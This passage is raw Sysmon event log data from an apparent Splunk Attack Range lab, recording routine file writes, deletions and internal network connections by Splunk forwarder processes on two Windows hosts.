Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58D60CC3804914E51B8E3DBC2279AD67,SHA256=081D7B3B7E169BF1D192C50D7421EF934E382C8771B3555389A6A555C2BC3529falsetrue 11241100x800000000000000057344529Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:36.351{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml2021-09-16 14:17:08.076 23542300x800000000000000057344528Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:36.351{8B6011A9-BB8A-618B-4CA0-04000000F101}7452NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=191BF671B22BB6D0D8098F4764225CD4,SHA256=587F0439BC6F77A0432866DC98383BB4980C713A6CBE1D9A500FD8BFA4A6C98Dfalsetrue 11241100x800000000000000057344527Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:36.335{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344526Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:36.335{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F2F235CE56A450B53F24CA4F4C0DE0F,SHA256=C999A528B9464B44509144A5A3B991F402895F2084762F78FAD55231F8A0B1BEfalsetrue 23542300x800000000000000021219331Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:36.689{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=706D61DFAC35F15B6CF232DE4D5AF164,SHA256=F33D32109579CF44EC307A4FAACE3F66C0A94311EB2F4845DDE04144B835F5AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344525Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:36.235{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344524Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:36.235{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=14A9FE37E02ED5CED394DAE30259C437,SHA256=9D238C763A9D060D9F0F932A7ADFEAD8CB3607E5A707EEB4944A32FFF6EBE5DDfalsetrue 23542300x800000000000000021219334Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:37.690{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B069668C70B6DDFA57F22B305A6E2BE,SHA256=2FAAABCE0719FD5E962516A529EAB98EA619517A623738E71F8A638C4C6F1BAF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344534Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:37.352{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344533Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:37.352{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=94184E8B3B2C3AD1C8EE420258092E0A,SHA256=1A3F7F2FD2CE756227C69E1929ABBBB28B24E9E13ECE296CE0476B9B1847BF7Dfalsetrue 11241100x800000000000000057344532Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:37.336{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344531Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:37.336{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1468840748911D8EFBAD77F3C6840E6,SHA256=6D45999A6F4B0B195F37E01B8932F986ED3E70A96DBD8D31180F085DF0D6346Afalsetrue 354300x800000000000000057344530Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:07.566{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54517-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219333Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:37.236{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCAC179B756242E3EB721F342234E570,SHA256=42A69726E0030A8DC0488C9B6F896BBF28B029DD67AA952347D730F28CB8190B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219332Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:37.236{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACEECBF68BAB30261431F4166B636BD3,SHA256=D8613C650ED46D8F7F71230A4127CA16A9973222050E3C74FBB43F1F079BAFC5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219336Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:38.704{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0812EDFDA2300E953FD9B5552C36604,SHA256=A7B20E75EDDBE2C406AE257CD806BC476A9A0D1ECDCAB28225AC9AA688847EC5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344537Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:38.350{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344536Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:38.350{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=219D9467831ED63AD0C36E98CBD07DB1,SHA256=39443353127405A228243DE6EC1ACD38E499C4E808F631F9AB52DDF60440EFAAfalsetrue 354300x800000000000000021219335Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:24.655{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64304-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x800000000000000057344535Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.702{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54518-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x800000000000000021219337Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:39.704{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=662850C2E8328635011CD1925024C8B7,SHA256=4EF4FAE1E78FEFF441059B08721D656BFBFDD7ECE2379E799E6166144DB988C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344539Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:39.366{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344538Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:39.366{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=809A9AD33D754EC3C856DFABC964CB64,SHA256=A83745ED75D8E016E7B69139405E23B53F0F6E8699D73256AB1DEB8F0C800FF5falsetrue 23542300x800000000000000021219338Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:40.704{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A78535DC3FB61AD73852E7EF5E997EB5,SHA256=D21E618101D2313263B2B0D0201F4080249483EB02550C2AE2E2332C8B6A71DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344541Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:40.381{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344540Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:40.381{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=914B122F1FAE576C6FAF146A8C85FCA7,SHA256=0B4C12960C952FAF76F727434651B6C1F02EED79B7A86E40ACF9EAD82A1F4CA9falsetrue 23542300x800000000000000021219339Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:41.704{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66F3C8304DDE3D601FAD29C8B534F0ED,SHA256=807D9CC2FC51B046697101772793ADAC8CBC67B5FC88D8464B42C3BC7B45CA12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344545Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:41.382{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344544Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:41.382{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5491BA02D5C203813487A702E1CD25FF,SHA256=636D9A48928DA0FEB7847CFC2971CA5980C62E727E4F1F8FB2230C9D32D9C494falsetrue 11241100x800000000000000057344543Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:41.235{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344542Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:41.235{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05B71D32AE628E3E506103B2FA867037,SHA256=C85E7D97268E6EE0C78CF90C09242FA56F87E44F793A9167DFD1230D3B5A913Ffalsetrue 23542300x800000000000000021219340Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:42.704{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61DC4B40B090D6CD6293CF522DEAB24C,SHA256=73509A21386DFF0BAE12197F5D86A77C3FAC785DDFCCC7E1F7353E9FA35B5646,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344548Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:42.385{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344547Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:42.385{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=583C570B501A70A2D5E2EEB84E666BFE,SHA256=02787B060D0ADAAB0D489316525EA91A87A84A8261CA6A6CAF3831D2532EBD69falsetrue 354300x800000000000000057344546Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:12.585{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54519-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219344Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:43.705{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C6204EF3816F2680A6509CB1D173626,SHA256=6882EB7A3775877951FEBF0FDAA97EC6BD34D42517E10298FDAAAF7F94C055C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344552Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:43.568{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344551Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:43.568{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D81CB6A968A93B00901574276AF5A62,SHA256=61046FFA6BCE944BB3F084B967153E26EBB32A45A4FAA0453A1156BC960164A2falsetrue 11241100x800000000000000057344550Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:43.400{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344549Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:43.400{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DE6CAFD952FA2C5F4223B9162C98905,SHA256=6A8A2B0EF9BAA0F536A1800E22366F3045293A24555D0B4630F42845492E393Dfalsetrue 354300x800000000000000021219343Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:30.499{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64305-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219342Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:43.095{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA9C711A8F0E42631068669DF62C7682,SHA256=D38721D54B6525E813B70B7464F32D0539E50A21E165A38E2E9105076DDCD1A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219341Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:43.095{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCAC179B756242E3EB721F342234E570,SHA256=42A69726E0030A8DC0488C9B6F896BBF28B029DD67AA952347D730F28CB8190B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219345Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:44.720{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29B854A4AE1BA61CBB8998ECCC087570,SHA256=1E88129B46BFE45BC7BCB09B3B989636675282C5EDCC804C75050F066676DB1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344554Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:44.418{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344553Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:44.418{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C7FEE9DAF221E494B91B7ACE1A782C0,SHA256=F3859B8381774D78B9F50778CA3CC97631A1A3F99F3C67B7C2F1E512B36A6D69falsetrue 23542300x800000000000000021219346Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:45.720{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B54E0EC11F6938C0719C790AE0026B0,SHA256=6AA8D4DFA370C7AB544F38864021867D8FB81A291080E217F45F2A6B534CD18F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344556Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:45.436{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344555Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:45.436{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C5F1079BDC2CBDAF3E7C6B53CD29F70,SHA256=47C36E4D3FF8D965A40EAEFD69AFC1044C3DEB083F6145C77F24E28A6376F18Dfalsetrue 23542300x800000000000000021219347Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:46.720{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D6CA5F1993555415A163883D74889A7,SHA256=41D51CA512076EF3DC6D4DCE7C8A48B08E9066133B12549DDFF4569515455A19,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344558Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:46.452{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344557Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:46.452{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4837AD6CFF68CD0141B650BEA6A59AA0,SHA256=895DD117FA02BE613C0FC08ACB5CF472891D2D807CB880B452BCCB553514A3A2falsetrue 23542300x800000000000000021219348Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:47.725{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=031E7AE23AD034AFF67FB112F82A0A7E,SHA256=50620FD587903F0842BD25A18A2A76E687191EEE53FA4EA238E5C05608F6DC4A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344563Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:47.452{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344562Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:47.452{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65A5D8CE598E0853D64AB512615374D7,SHA256=4852463DCCCF2CAC89D47A4717DE500B4E158E09115F0043CCAD9B77CF72C2E4falsetrue 354300x800000000000000057344561Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:18.450{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54520-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057344560Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:47.099{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344559Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:47.099{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92CA6334F3F61C960AF5032589F3FA4D,SHA256=A4CD53615E34AD604DF20D8E0C86BD9D8E330B43DD1E50A92BE0AF29F6272D03falsetrue 23542300x800000000000000021219351Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:48.725{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program 